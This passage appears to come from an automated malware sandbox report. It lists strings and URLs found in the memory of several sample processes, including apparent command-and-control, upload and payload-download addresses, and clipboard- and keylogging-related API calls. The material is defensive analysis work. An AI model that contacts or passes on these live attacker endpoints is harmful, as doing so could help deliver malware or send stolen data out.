Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23LRjqp
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24LRjq
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2LRjq
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3LRjq
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4LRjq
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5LRjq
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6LRjq(
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7LRjq
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8LRjq
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9LRjq
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9Responsex
Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/
Source: 3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/#F
Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/)
Source: 3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/1F
Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/2
Source: 3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/:F
Source: 3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/DG
Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/E
Source: 3546345.exe, 00000025.00000002.4775940501.0000000002441000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/F
Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/N
Source: 3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/RG
Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/S
Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/a
Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/g
Source: 3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/iG
Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/j
Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v
Source: 3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmp, 3546345.exe, 00000025.00000002.4775867809.00000000023FF000.00000004.00000020.00020000.00000000.sdmp, 3546345.exe, 00000025.00000002.4763090277.000000000112E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.php
Source: 3546345.exe, 00000025.00000002.4775867809.00000000023FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.php%qN
Source: 3546345.exe, 00000025.00000002.4775867809.00000000023FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.php/qH
Source: 3546345.exe, 00000025.00000002.4763090277.000000000112E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.php0
Source: 3546345.exe, 00000025.00000002.4774750155.0000000001280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.php9
Source: 3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.phpBJ
Source: 3546345.exe, 00000025.00000002.4774750155.0000000001280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.phpG
Source: 3546345.exe, 00000025.00000002.4775867809.00000000023FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.phpIq
Source: 3546345.exe, 00000025.00000002.4774750155.0000000001280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.phpM?
Source: 3546345.exe, 00000025.00000002.4775867809.00000000023FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.phpOq(
Source: 3546345.exe, 00000025.00000002.4775867809.00000000023FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.phpQq:
Source: 3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.phpXJ
Source: 3546345.exe, 00000025.00000002.4774750155.0000000001280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.phpj
Source: 3546345.exe, 00000025.00000002.4774750155.0000000001280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.phpl
Source: 3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.phpsrJG
Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/x
Source: 3546345.exe, 00000025.00000002.4774750155.0000000001280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top:80/v1/upload.php
Source: 3546345.exe, 00000025.00000002.4774750155.0000000001280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top:80/v1/upload.phposoft
Source: 3546345.exe, 00000025.00000002.4774750155.0000000001280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top:80/v1/upload.phpraz
Source: Shipment.pif, 0000000B.00000000.2048576959.0000000000A19000.00000002.00000001.01000000.00000006.sdmp, Shipment.pif, 0000000B.00000003.2056731275.00000000046B2000.00000004.00000800.00020000.00000000.sdmp, GuardTrack.scr, 00000013.00000000.2074054599.0000000000679000.00000002.00000001.01000000.00000008.sdmp, GuardTrack.scr, 00000015.00000000.2161600759.0000000000679000.00000002.00000001.01000000.00000008.sdmp, Shipment.pif.1.dr, GuardTrack.scr.11.dr, Scottish.0.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr	String found in binary or memory: http://www.entrust.net/rpa03
Source: meta.exe, 00000027.00000002.3873284492.00007FF617EB7000.00000002.00000001.01000000.00000013.sdmp, meta.exe, 00000027.00000002.3872094991.00007FF617E51000.00000004.00000001.01000000.00000013.sdmp, meta.exe, 00000027.00000002.3650886377.00000220BB800000.00000004.00001000.00020000.00000000.sdmp, meta.exe, 00000027.00000000.3447262254.00007FF617EB7000.00000002.00000001.01000000.00000013.sdmp, meta.exe, 00000027.00000002.3650886377.00000220BC200000.00000004.00001000.00020000.00000000.sdmp, meta.exe.11.dr, meta[1].exe.11.dr	String found in binary or memory: https://aka.ms/GlobalizationInvariantMode
Source: meta[1].exe.11.dr	String found in binary or memory: https://aka.ms/nativeaot-compatibilityY
Source: meta.exe, 00000027.00000002.3872094991.00007FF617E51000.00000004.00000001.01000000.00000013.sdmp	String found in binary or memory: https://aka.ms/nativeaot-compatibilityh
Source: meta.exe, 00000027.00000002.3873284492.00007FF617EB7000.00000002.00000001.01000000.00000013.sdmp, meta.exe, 00000027.00000002.3650886377.00000220BB800000.00000004.00001000.00020000.00000000.sdmp, meta.exe, 00000027.00000000.3447262254.00007FF617EB7000.00000002.00000001.01000000.00000013.sdmp, meta.exe, 00000027.00000002.3650886377.00000220BC200000.00000004.00001000.00020000.00000000.sdmp, meta.exe.11.dr, meta[1].exe.11.dr	String found in binary or memory: https://aka.ms/nativeaot-compatibilityy
Source: InstallUtil.exe, 00000032.00000002.3758938143.000000000333A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.s
Source: InstallUtil.exe, 00000032.00000002.3758938143.000000000333A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000033.00000002.3597562499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, WIDeqOfZq9.exe.51.dr	String found in binary or memory: https://api.ip.sb/ip
Source: winmsbt.exe, 00000021.00000002.4712142699.0000000003289000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://direct-link.net/1218649/browse-and-buy-cs2-skins
Source: winmsbt.exe, 00000021.00000002.4712142699.0000000003289000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://direct-link.net/1218649/windows-latest-updates
Source: InstallUtil.exe, 00000032.00000002.3758938143.00000000033CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/users/
Source: winmsbt.exe, 00000021.00000002.4712142699.0000000003289000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRYqOGCv-jevzMWu9XILkZeuC_BAi1BgW9cnKgQP1CVVw&s
Source: Cerker.exe, 0000001C.00000003.3509353341.0000000001219000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000C93000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3445287126.0000000000C9D000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3733155923.0000000000D15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net/
Source: Cerker.exe, 0000001C.00000003.3385926643.000000000121B000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.3382418323.000000000121B000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.3386987728.000000000121B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net/1G
Source: Cerker.exe, 00000022.00000002.4622434555.0000000000C93000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3445287126.0000000000C9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net/5
Source: Cerker.exe, 00000022.00000002.4622434555.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net/G
Source: Cerker.exe, 00000022.00000003.4041557300.0000000000D01000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3733155923.0000000000D15000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000D15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net/socket/?id=5DCF833859158E570DD9A3BCC4B61D98E7D449D8067545A1379CD9413F2CB
Source: Cerker.exe, 0000001C.00000002.4585160635.0000000000DAA000.00000004.00000010.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000002.4613814551.0000000001198000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000002.4613814551.0000000001215000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.3509353341.0000000001219000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4605809813.0000000000AFA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net:443/socket/
Source: Cerker.exe, 0000001C.00000002.4585160635.0000000000DAA000.00000004.00000010.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4605809813.0000000000AFA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net:443/socket/.)
Source: Cerker.exe, 00000022.00000002.4622434555.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net:443/socket/3422
Source: Cerker.exe, 0000001C.00000002.4613814551.0000000001198000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000002.4613814551.0000000001215000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.3509353341.0000000001219000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net:443/socket/7345342
Source: Cerker.exe, 00000022.00000003.4041557300.0000000000D01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net:443/socket/?id=5DCF833859158E570DD9A3BCC4B61D98E7D449D8067545A1379CD9413
Source: Cerker.exe, 00000022.00000002.4622434555.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net:443/socket/se
Source: winmsbt.exe, 00000021.00000002.4712142699.0000000003234000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.000000000325F000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.000000000331B000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.0000000003346000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.000000000320A000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.00000000032B3000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.00000000030F3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com
Source: winmsbt.exe, 00000021.00000002.4712142699.0000000003031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/fiLr6dSt
Source: 3546345.exe, 00000025.00000000.3386144333.00000000005AD000.00000002.00000001.01000000.00000010.sdmp, 3546345[1].exe.11.dr, channel2[1].exe.11.dr, 3546345.exe.11.dr, Channel1[1].exe.11.dr	String found in binary or memory: https://update-ledger.net/update
Source: Shipment.pif, 0000000B.00000003.2056731275.00000000046B2000.00000004.00000800.00020000.00000000.sdmp, Shipment.pif.1.dr, GuardTrack.scr.11.dr, Scottish.0.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Cerker.exe, 0000001C.00000003.3509353341.0000000001219000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3445287126.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000C93000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3445287126.0000000000C9D000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3429372925.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000D01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/
Source: Cerker.exe, 00000022.00000003.3445287126.0000000000C9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/(e
Source: Cerker.exe, 0000001C.00000003.4059843797.0000000001215000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/K
Source: Cerker.exe, 00000022.00000002.4622434555.0000000000C93000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3445287126.0000000000C9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/Pe
Source: Cerker.exe, 0000001C.00000002.4613814551.0000000001198000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/S
Source: Cerker.exe, 00000022.00000003.3445287126.0000000000C9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/he
Source: Cerker.exe, 0000001C.00000002.4613814551.0000000001215000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/r
Source: Cerker.exe, 0000001C.00000002.4613814551.0000000001215000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/rs
Source: Cerker.exe, 00000022.00000003.3445287126.0000000000C9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/scl/fi/rqsnrl6msilfirz1qp1pn/weetwegsdg.exe?rlkey=rmj9i20g87wwdvd6wsdaypie2&
Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr	String found in binary or memory: https://www.entrust.net/rpa0
Source: Scottish.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: Shipment.pif, 0000000B.00000003.2056731275.00000000046B2000.00000004.00000800.00020000.00000000.sdmp, Shipment.pif.1.dr, GuardTrack.scr.11.dr, Scottish.0.dr	String found in binary or memory: https://www.globalsign.com/repository/06

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_00624632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

19_2_00624632

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_00624830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

19_2_00624830

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

19_2_00624632

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_00610508 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

19_2_00610508

Source: InstallUtil.exe, 00000032.00000002.3758938143.00000000034C7000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_f3a5e7a4-8

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

